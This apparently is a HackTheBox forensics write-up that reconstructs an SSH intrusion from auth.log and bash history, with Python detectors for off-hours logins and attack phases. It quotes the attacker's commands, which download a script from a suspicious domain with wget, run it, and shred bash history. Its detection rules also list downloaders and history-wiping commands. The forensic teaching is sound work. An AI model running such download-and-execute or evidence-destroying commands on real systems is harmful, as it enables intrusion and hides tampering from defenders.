An unusual sighting

HackTheBox

Tags: forensics, free, easy


Techniques: log correlation, timeline analysis, behavioral analysis


Overview

This forensics challenge required analyzing SSH logs and bash history to identify a security incident on a development server. The task was to detect signs of unauthorized access, trace the attacker's activities, and extract the flag from the evidence.

The investigation centered on a compromised development server that was accessed from an unusual external IP address during non-business hours, followed by typical post-exploitation activities including system reconnaissance, payload delivery, and evidence destruction.

Solution

Step 1: SSH Log Analysis

The primary evidence files were SSH authentication logs (auth.log) and bash command history (.bash_history). Initial examination of the SSH logs revealed a successful login from an unexpected external source:

Feb 19 04:00:14 server sshd[12345]: Accepted publickey for devuser from 2.67.182.119 port 62221 ssh2

Key findings from log analysis:

  • Attacker IP: 2.67.182.119 (external, non-corporate address)
  • Target SSH server: 100.107.36.130:2221 (non-standard port)
  • Attack timestamp: 2024-02-19 04:00:14 (4 AM — outside work hours)
  • Authentication method: Public key (no password required)
  • Attacker SSH key fingerprint: OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4
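The flagging logic described above (external source address plus an off-hours timestamp), written out as an added example that is not part of the original writeup. It parses OpenSSH "Accepted" lines in the classic syslog format shown, and the sample log is constructed here: the writeup's own login line plus invented benign logins for contrast. The corporate address range (10.0.0.0/8), the business-hours window (08:00-17:59) and the year passed to the parser are assumptions, since an auth.log timestamp carries no year.

```python
import ipaddress
import re
from datetime import datetime

# Shape of an OpenSSH "Accepted ..." line in a syslog-style auth.log.
# Assumption: no year in the timestamp (classic auth.log); the caller supplies it.
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)

# Constructed sample: the line quoted in the writeup plus two benign logins
# invented here (corporate RFC 1918 address, business hours) and one failure.
SAMPLE_AUTH_LOG = """\
Feb 18 09:12:03 server sshd[11001]: Accepted password for devuser from 10.20.30.40 port 51022 ssh2
Feb 18 17:45:59 server sshd[11872]: Accepted publickey for devuser from 10.20.30.41 port 50444 ssh2
Feb 19 04:00:14 server sshd[12345]: Accepted publickey for devuser from 2.67.182.119 port 62221 ssh2
Feb 19 04:00:15 server sshd[12345]: Failed password for invalid user admin from 2.67.182.119 port 62222 ssh2
"""

# Assumptions: the organisation's address space and its working hours.
CORPORATE_NETS = [ipaddress.ip_network("10.0.0.0/8")]
BUSINESS_HOURS = range(8, 18)  # 08:00 to 17:59


def parse_accepted(log_text, year):
    """Return one dict per successful SSH login found in log_text."""
    events = []
    for line in log_text.splitlines():
        m = ACCEPTED_RE.match(line)
        if not m:
            continue  # failed logins and other sshd noise are not logins
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({
            "time": ts,
            "user": m["user"],
            "method": m["method"],
            "ip": m["ip"],
            "port": int(m["port"]),
        })
    return events


def is_external(ip):
    """True when the address lies outside every corporate network."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in CORPORATE_NETS)


def flag_logins(events):
    """Return only the logins that trip a rule, each with the reasons attached."""
    flagged = []
    for ev in events:
        reasons = []
        if is_external(ev["ip"]):
            reasons.append("external source address")
        if ev["time"].hour not in BUSINESS_HOURS:
            reasons.append("outside business hours")
        if reasons:
            flagged.append({**ev, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for ev in flag_logins(parse_accepted(SAMPLE_AUTH_LOG, 2024)):
        print(ev["time"], ev["user"], ev["method"], ev["ip"], "->", "; ".join(ev["reasons"]))
```

Run against the sample, only the 04:00 login from 2.67.182.119 is reported, with both reasons; the two daytime logins from the 10.0.0.0/8 range pass silently. The failed-password line is deliberately ignored by the parser because only successful authentications matter for this rule; a separate brute-force rule would count the failures instead.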

Step 2: Bash History Analysis

Examining the user's bash history revealed a clear sequence of post-exploitation activities:

whoami                                 # Confirm user context
uname -a                               # System reconnaissance
cat /etc/passwd                        # User enumeration
wget http://gnu-packages.com/setup.sh  # Payload download from suspicious domain
shred -u ~/.bash_history               # Evidence destruction
./setup                                # Execute malware

The commands demonstrate a classic attack lifecycle:

  1. Reconnaissance: Basic system information gathering
  2. User enumeration: Identifying system users via /etc/passwd
  3. Initial access: Downloading a malicious script from gnu-packages.com
  4. Covering tracks: Using shred to destroy bash history evidence
  5. Persistence/execution: Running the downloaded malware with ./setup
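The lifecycle mapping in the list above, as an added example that is not part of the original writeup: a small classifier that walks a recovered .bash_history, tags each command with a phase, and pulls the download domains out as indicators. The sample history is constructed here from the six commands quoted in the writeup plus invented benign developer commands; the phase names and the tool lists behind each rule are this example's own assumptions, not a standard taxonomy.

```python
import shlex
from urllib.parse import urlparse

# Constructed sample: the commands recovered in the writeup, preceded by
# ordinary developer activity invented here so the classifier has noise to skip.
SAMPLE_HISTORY = """\
cd ~/project
git status
whoami
uname -a
cat /etc/passwd
wget http://gnu-packages.com/setup.sh
shred -u ~/.bash_history
./setup
"""

# Assumption: these tool lists are illustrative, not exhaustive.
RECON_TOOLS = {"whoami", "id", "uname", "hostname", "ifconfig", "ip", "ps", "netstat"}
READ_TOOLS = {"cat", "less", "more", "head", "tail", "getent"}
SENSITIVE_FILES = {"/etc/passwd", "/etc/group", "/etc/shadow", "/etc/sudoers"}
DOWNLOADERS = {"wget", "curl", "fetch"}


def classify(cmd):
    """Map one shell command to a lifecycle phase, or None for benign activity."""
    try:
        argv = shlex.split(cmd)
    except ValueError:            # unbalanced quotes: fall back to naive split
        argv = cmd.split()
    if not argv:
        return None
    prog, args = argv[0], argv[1:]
    if prog in RECON_TOOLS:
        return "reconnaissance"
    if prog in READ_TOOLS and any(a in SENSITIVE_FILES for a in args):
        return "user enumeration"
    if prog in DOWNLOADERS and any(a.startswith(("http://", "https://")) for a in args):
        return "payload download"
    if prog == "shred" or (prog in {"rm", "unlink"} and any("history" in a for a in args)) \
            or (prog == "history" and "-c" in args):
        return "anti-forensics"
    if prog.startswith("./") or prog in {"bash", "sh"} and args:
        return "execution"
    return None


def analyze(history_text):
    """Return [(command, phase), ...] in the order the commands were run."""
    return [(line, classify(line)) for line in history_text.splitlines() if line.strip()]


def summarize(history_text):
    """Distinct phases in order of first appearance, plus download domains as indicators."""
    phases, indicators = [], []
    for cmd, phase in analyze(history_text):
        if phase and phase not in phases:
            phases.append(phase)
        if phase == "payload download":
            for a in shlex.split(cmd)[1:]:
                host = urlparse(a).hostname
                if host and host not in indicators:
                    indicators.append(host)
    return {"phases": phases, "indicators": indicators}


if __name__ == "__main__":
    for cmd, phase in analyze(SAMPLE_HISTORY):
        print(f"{phase or '-':18} {cmd}")
    print(summarize(SAMPLE_HISTORY))
```

On the sample this yields the five phases in the writeup's order (reconnaissance, user enumeration, payload download, anti-forensics, execution) and gnu-packages.com as the single indicator. Ordering matters for behavioral analysis: a developer who runs `cat /etc/passwd` once is not interesting, but recon followed by a download, history shredding and execution of the downloaded file inside a few minutes is the pattern worth alerting on.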

Step 3: Anomaly Detection

Several red flags were identified:

...
